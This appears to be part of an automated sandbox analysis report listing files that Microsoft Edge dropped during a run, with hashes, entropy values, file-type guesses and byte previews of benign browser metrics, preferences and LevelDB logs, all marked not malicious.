                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):4194304
                                                                                                                                                                                                                                                                Entropy (8bit):0.04759814626283603
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:UIuCubv0pqtmvnOAQJYCQJ/7qiRD80JVFg8Xx+VInhEHsBzhEhNGMv+RQ8TfWdas:o9bv0cto4QV6onhcxmvWda08T2RGOD
                                                                                                                                                                                                                                                                MD5:2962D80F8DC19918E495A04688B8B475
                                                                                                                                                                                                                                                                SHA1:CFA30FEE92CA3749977AFB51FCC62E643BF601D6
                                                                                                                                                                                                                                                                SHA-256:91811F5458D61844EBEE219E58476E324C10143F6E6A65D1B9E15E1413B362BE
                                                                                                                                                                                                                                                                SHA-512:F77CA78B8F4DC6F7723C596E39A4C0488372569ABB8CC42EF7105D1CB88C3A01D1DFC8F1D4532F83AF711CBA869690C3E20C353FBAFF23FD195084E1533DEF28
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:...@..@...@.....C.].....@................k...Z..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?.......".ohxxms20,1(.0..8..B.......2.:.M....U....e...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............!......................w..U..G...W6.>.........."....."...24.."."h5wmA/c+VK/+HCTGwU1TrwNY52XBTo9O05htSkjnNRA="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...V.-../Q@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2..........I...... .`2..........

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-6760214D-420.pma

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:DIY-Thermocam raw data (Lepton 3.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 2048.000000, slope 17753217332035315519916605440.000000
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):4194304
                                                                                                                                                                                                                                                                Entropy (8bit):0.4295604991223989
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3072:4IzsLqsTfrV0WNw9grzvbdP82t2exdZFFPtPBdqNbZLgQkFg1HFd:psLjrugfvbdP8uFPtPBdqN9LgQkFaHn
                                                                                                                                                                                                                                                                MD5:1C17A4E50C1E8BF0117E7835B6FA7DA6
                                                                                                                                                                                                                                                                SHA1:07C07026BF5A7F33A33DA447C37A466DDABFCB6A
                                                                                                                                                                                                                                                                SHA-256:6B3A7DF392DB9D09FB892544A0B080CEE35F099E59D925884EF8D5D6E04485A0
                                                                                                                                                                                                                                                                SHA-512:5DEE014AEE1B71876EDE40163F036B53E9C0E6A3572DE4D18794D6286F3C48FB43ACFB55A170420DAEEFE47EA0AACBE604819A6204890DB080E07DFE391C534B
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:...@..@...@.....C.].....@...............xG...F..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?.......".ohxxms20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............!......................w..U?:K...G...W6.>.........."....."...24.."."h5wmA/c+VK/+HCTGwU1TrwNY52XBTo9O05htSkjnNRA="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...V.-../Q@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2.............. .2.......

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):280
                                                                                                                                                                                                                                                                Entropy (8bit):4.195531555605597
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:FiWWltlMpKoKuNoDZbkDURSHxig5ABVP/Sh/JzvNKIUBUhX9USWXQPWllt:o1GVKCoD4Hxi2ABVsJDZYeulX+W/
                                                                                                                                                                                                                                                                MD5:B43C738AB1422F16D60B4C4B49CC7DF2
                                                                                                                                                                                                                                                                SHA1:98C07F5F5E4F25C2BC0B2B5E6A3A2245F7D18215
                                                                                                                                                                                                                                                                SHA-256:C28208A8D5052C44515333D67BE35E9900BB0C1E68DECF8C8CDC8DB67DE51E4C
                                                                                                                                                                                                                                                                SHA-512:07A58D40C283CBDB4063D1EF70EBDAFF8E84CB47F530B939FA25195F9652976CB3E439F315A18D732128E60B5F2856DC1CA42E814DE45F2301DC143A0D22798E
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:sdPC.........................TJ.[Y....."h5wmA/c+VK/+HCTGwU1TrwNY52XBTo9O05htSkjnNRA="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................ecadf109-1d88-4bd2-8ebf-85346832b43e............

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\1aa45a5b-5198-4721-85ef-a9c979380563.tmp

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:.

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\283ee4ec-9117-4169-abf4-23bed4b1cca3.tmp

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (17358), with no line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):17364
                                                                                                                                                                                                                                                                Entropy (8bit):5.494852263126019
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:st5PGQSu4Cs4ZXV+Vl1xSqDQ3iQrTebGCQwXmf7NIl:s7OXuxZwnCX3TGbGxVi
                                                                                                                                                                                                                                                                MD5:22D4FC2E4981D9259D01F3A3440E0DAC
                                                                                                                                                                                                                                                                SHA1:C5394A24025BB966A0843988473DF43AFD6CEB65
                                                                                                                                                                                                                                                                SHA-256:3378B96A4776BA5A1D85A4E052579CE2093FD1B93D76B6D79F23AD8D9AD66219
                                                                                                                                                                                                                                                                SHA-512:4BF2CBAFF994542DEBA0710E60F49130D81C935908D2DBCEB7C335031EDE2A26E000278D63FE06C7C4693A75DA90B10145C181BC0688D7597F812288796C4768
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378826830031057","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340968290017037","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\3116c8ac-d362-41fe-909b-e97844d01725.tmp

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):115717
                                                                                                                                                                                                                                                                Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\62a21ba3-c3b2-43bb-a5e5-2acaa9704b3e.tmp

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):9499
                                                                                                                                                                                                                                                                Entropy (8bit):5.11305086439715
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:st5kdpCs4ZIa34Hk+8EX8tbV+FW3QA4Jq7NIOPNYJ:st5QCs4ZX1/bGCQx07NIl
                                                                                                                                                                                                                                                                MD5:FF8C0A97C32B79A36C19405A7777981B
                                                                                                                                                                                                                                                                SHA1:8E5804FA0600F6656891B1AC73F25615620C884F
                                                                                                                                                                                                                                                                SHA-256:3DC64149203FE087B93E2BBA60672C47DA216D88FB9C39F361A2960E63581D06
                                                                                                                                                                                                                                                                SHA-512:52DF329A16692596ED9B66DE1917B60BCD3956328B3FC022AAEF54452445041D2CDF1C1D2084CB2CC2AD16F0DEFC016CB7AC48413F3BBD77690E57ED834AE005
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378826830031057","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340968290017037","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\69eb029a-0dd9-47ed-bdce-84e3d1e64a42.tmp

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:.

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\83a6c6b8-80cb-45ce-8579-9506f83358b1.tmp

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (17009), with no line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):17015
                                                                                                                                                                                                                                                                Entropy (8bit):5.499922414789494
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:st5PGQSu4Cs4ZXV+Vl1xSqDQ3iQrTAbGCQwX07NIl:s7OXuxZwnCX3TobGxji
                                                                                                                                                                                                                                                                MD5:C6B9EAC0593628222373CC85DA9D652A
                                                                                                                                                                                                                                                                SHA1:9D63F3CAB0D8234A4B65B32C9EC04CBAD9A3D7B1
                                                                                                                                                                                                                                                                SHA-256:9A095E4900139BAA6B1BEDB287370D927763C408745E309FB67649B8FA8B4FED
                                                                                                                                                                                                                                                                SHA-512:C13A1D0D75E291E0BC355B0DAA46B670B04D802E4E4A3F286EB36AC49408DD32BF31EDCEC5B87719B0D5ADA3A073EFDAC01B0E47766F3EF3DE1BE103CE62E867
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378826830031057","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340968290017037","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000003.log

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):33
                                                                                                                                                                                                                                                                Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                                MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                                SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                                SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                                SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:...m.................DB_VERSION.1

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\CURRENT (copy)

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\LOG

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):309
                                                                                                                                                                                                                                                                Entropy (8bit):5.255578930715595
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:7AH0RM1CHhJ23oH+Tcwtp3hBtB2KLlpAWVq2PCHhJ23oH+Tcwtp3hBWsIFUv:7ooAYebp3dFLTjVvBYebp3eFUv
                                                                                                                                                                                                                                                                MD5:1C58035CAA4255A7FDF4F21574347DA8
                                                                                                                                                                                                                                                                SHA1:B1E6685FA219E9AD54BCB40C93FAD7A49FCB8677
                                                                                                                                                                                                                                                                SHA-256:A704D9ADEAEDE6EAD4E346918BFAB09C87941DDD51BC0364DC07F7F990B8CAF2
                                                                                                                                                                                                                                                                SHA-512:84B7C59C8BCAE7E034A28CE4987D633755404B46683AEED80D707BEFA8344ADEF68D94A7BEA6B904133924D9A6B9532D01B1600B9A3931121327A1418737A830
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:2024/12/16-07:47:14.513 1fe4 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/12/16-07:47:14.737 1fe4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                Size (bytes):1764710
                                                                                                                                                                                                                                                                Entropy (8bit):5.138097330002853
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24576:hKPOfKfgXaHbMhFQlmADAbpENUdifYOBHbc2r:hKmfqJmcx
                                                                                                                                                                                                                                                                MD5:A39A17DF31BC28E1AFF0350FE1E51DED
                                                                                                                                                                                                                                                                SHA1:355007EA6EAB659DB0A79EFE94A902F747B6827D
                                                                                                                                                                                                                                                                SHA-256:37AC9ED8A32BA2291A1DEB7F8C2B09718F138A6FD1E054F3219EA7BDA24DEABC
                                                                                                                                                                                                                                                                SHA-512:63BF5B3F015AC5ACB6046825FDB4C9372880894555BE5F3BC075912CD5A4422006E00A6AB8B5F4931AB444C4980CD961233593796A8671CEA6143963F4EE01E6
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:...m.................DB_VERSION.1.Go..................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340967444415546.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):336
                                                                                                                                                                                                                                                                Entropy (8bit):5.169065963377811
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:7A0q2PCHhJ23oH+Tcwt9Eh1tIFUt8OAxhFZZmw+OA8ckwOCHhJ23oH+Tcwt9Eh1H:7rvBYeb9Eh16FUt8OwX/+OE56Yeb9Ehx
                                                                                                                                                                                                                                                                MD5:CF7D63975AFAAB9D6398C1106D4E9227
                                                                                                                                                                                                                                                                SHA1:185C499A0A719A38F015DB43C6D75BE32DEAFF2C
                                                                                                                                                                                                                                                                SHA-256:F377D0C90A5F74C90C4C34AD7D515286DE2D8DAEB851BC02F60A2958841C0830
                                                                                                                                                                                                                                                                SHA-512:38EC42D5D1A9ED081FD8C50942E7496D6A09E3FEDB19429A1016DB483D653C7B4192BB63766B38CCEC7963F03E532548A8DD40C5FC7CEC0E68D0DC4F37DC883C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:2024/12/16-07:47:14.387 1170 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/16-07:47:14.389 1170 Recovering log #3.2024/12/16-07:47:14.392 1170 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old (copy)

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):336
                                                                                                                                                                                                                                                                Entropy (8bit):5.169065963377811
                                                                                                                                                                                                                                                                Encrypted:false
